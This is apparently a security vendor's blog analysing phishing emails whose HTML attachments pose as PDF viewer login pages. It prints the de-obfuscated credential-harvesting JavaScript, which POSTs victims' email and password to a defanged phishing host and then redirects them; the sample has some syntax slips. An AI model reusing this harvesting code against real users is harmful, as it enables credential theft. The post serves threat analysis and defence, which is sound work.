Beware of HTML Masquerading as PDF Viewer Login Pages
Phishing attacks have evolved into increasingly sophisticated schemes designed to trick users into revealing their personal information. One such method that has gained prominence involves phishing emails that masquerade as PDF viewer login pages.
These deceptive emails lure unsuspecting users into entering their email addresses and passwords, compromising their online security. In this blog post, we will explore the intricacies of these phishing scams, how they operate, and the steps you can take to protect yourself from falling victim to them.
Forcepoint X-Labs has recently observed a significant number of phishing email instances in our telemetry targeting various government departments in APAC that masquerade as PDF viewer login pages. Figure 1 is shown for the sake of brevity. We have noticed they were coming from same envelop sender i.e hachemi52d31[at]live[.fr
Email Instance
Masquerading as PDF Viewer Login Page
By opening the HTML in a web-browser leads us to see a fake login page asking to verify the password. The main purpose is to get to know the victim credentials. The Figure 2 shows the PDF Viewer Login Page while browsing the HTML file.
HTML Code
Verifying the password in such scenario is very risky, therefore we need to investigate further to see what is happening inside the HTML. We have observed some hidden tags and an obfuscated code in HTML page. Attackers mostly use these things to hide their malicious intent.
The code appears to be an obfuscated JavaScript. It uses an array of strings that are accessed via hexadecimal indices to mask the actual content of the code. By decoding the obfuscated parts to make the code more readable and understand its functionality.
By placing these array elements in the rest of the code and do some manual research gives us the following de-obfuscated JavaScript.
De-Obfuscated JavaScript
<script>
$(document).ready(function () {
var _0x5558x5 = 0; // login_attempt i.e rc variable
$(document).keypress(function (_0x5558x6) {
var _0x5558x7 = _0x5558x6.keyCode ? _0x5558x6.keyCode : _0x5558x6.which;
if (_0x5558x7 == 13) {
_0x5558x6.preventDefault();
$(“#sub-btn”).click();
}
});
var _0x5558x8 = window.location.hash.substr(1); // URL Hash Processing
if (!_0x5558x8) {
//Not doing any thing
} else {
var _0x5558x9 = _0x5558x8;
var _0x5558xa = _0x5558x9.indexOf("@");
var _0x5558xb = _0x5558x9.substr(_0x5558xa + 1);
var _0x5558xc = _0x5558xb.substr(0, _0x5558xb.indexOf("."));
var _0x5558xd = _0x5558xc.toLowerCase();
$("#ai").val(_0x5558x9);
$("#aich").html(_0x5558x9);
$("#msg").hide();
} ;
$("#sub-btn").click(function (_0x5558x6) {
$("#error").hide();
$("#msg").hide();
_0x5558x6.preventDefault();
var _0x5558x8 = $("#ai").val();
var _0x5558xe = $("#pr").val();
var _0x5558xf = $("#msg").html();
$("#msg").text("Downloading…");
var _0x5558x9 = _0x5558x8;
var _0x5558x10 = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!_0x5558x8) {
$("#error").show();
$("#error").text("Email field is empty.!");
return false;
};
if (!_0x5558x10.test(_0x5558x9)) {
$("#error"). show();
$("#error").text("That account doesn't exist. Enter a different account");
return false;
};
if (!$("#div2").is(":visible")) {
$("#div2").animate({
right: 0,
opacity: show
}, 500);
return false;
};
if (!_0x5558xe) {
$("#error").show();
$("#error").text("Password field is empty.!");
return false;
};
var _0x5558xa = _0x5558x9.indexOf("@");
var _0x5558xb = _0x5558x9.substr(_0x5558xa + 1);
var _0x5558xc = _0x5558xb.substr(0, _0x5558xb.indexOf("."));
var _0x5558xd = _0x5558xc.toLowerCase();
_0x5558x5 = _0x5558x5 + 1;
$.ajax({
dataType: JSON,
url: "hxxp[://]s810733.ha007.t.mydomain[.]zone/xille/msn-ai.php", // f
type: "POST",
data: {
ai: _0x5558x8, // email address
pr: _0x5558xe // password
},
beforeSend: function (_0x5558x11) {
$("#sub-btn").val("Downloading...");
},
complete: function () {
$(#pr).val("");
if (_0x5558x5 >= 2) {
_0x5558x5 = 0;
window.location.replace.("hxxps[://]b1498432.smushcdn[.]com/1498432/wp-content/uploads/Credit-Card-Payment-Invoice-768x993.png?lossy=1&strip=1&webp=1"); // rdrt
return false;
} ;
$(#msg).show();
$("#sub-btn").val("Start Download");
}
});
}); domain_redirect
});
</script>
The code performs the following actions:
- It reads values from elements with IDs #f, #rc, #rdrt, and #domain_redirect. f, rc, rdrt, domain_redirect (not being used) are values extracted from hidden input field.
- It listens for the ready event on the document and initializes a keypress event listener i.e Document Ready Function.
- If the Enter key (key code 13) is pressed, it prevents the default action and triggers a click event on the submit button #sub-btn.
- It parses the hash part of the URL and extracts a portion of it, using it to set values in elements with IDs #ai and #aich. If a hash is present in the URL, it is processed to extract and display the email address.
- When the submit button #sub-btn is clicked, it performs several validations:
- Checks if the email field #ai is empty.
- Validates the email format.
- Checks if a certain element #div2 is visible.
- Checks if the password field #pr is empty.
- If all validations pass, it sends an AJAX POST request with the email and password fields to the URL retrieved from #f. It shows a downloading message during the request and resets the form once complete. If a certain condition based on rc is met, it redirects the user to the URL i.e #rdrt.
Summary of code action:
This code represents a phishing attempt to collect user credentials. The JavaScript validates user inputs, handles form submissions, and communicates with a backend server using AJAX. If certain conditions are met (e.g., number of login attempts), it redirects the user to a specified URL. The HTML structure sets up the form, error messages, and styling to resemble a legitimate site, but it's ultimately designed for malicious intent.
Figure 4 shows the redirected URL once the condition is met.
Conclusion
This code is designed to phish for user credentials. It should not be trusted or used. If you encounter this or similar code in the wild, report it to relevant authorities and avoid interacting with the site. Do not enter any personal information into websites or forms that you do not fully trust and verify the legitimacy of the sites you visit, especially when asked for sensitive information.
Protection statement
Forcepoint customers are protected against this threat at the following stages of attack:
- Stage 1 (Reconnaissance) – Harvest email addresses. Attacker address is blocked.
- Stage 2 (Lure) – Deliver weaponized HTML via email. Multiple weaponized HTML files were seen. Blocked by one of our email analytics.
- Stage 3 (Redirect) – Redirect to credit card invoice page after posting the credentials to actual phishing url. Redirected URL is blocked under security classification.
- Stage 6 (Call Home) – Credentials POSTing to a phishing URL. The URL is categorized and blocked under security classification.
Indicator of Compromise
|
hachemi52d31@live[.fr |
|
|
Subjects |
|
|
Phishing URL |
|
|
Credit Card Invoice Payment URL |
|
|
HTML SHA1 |
|
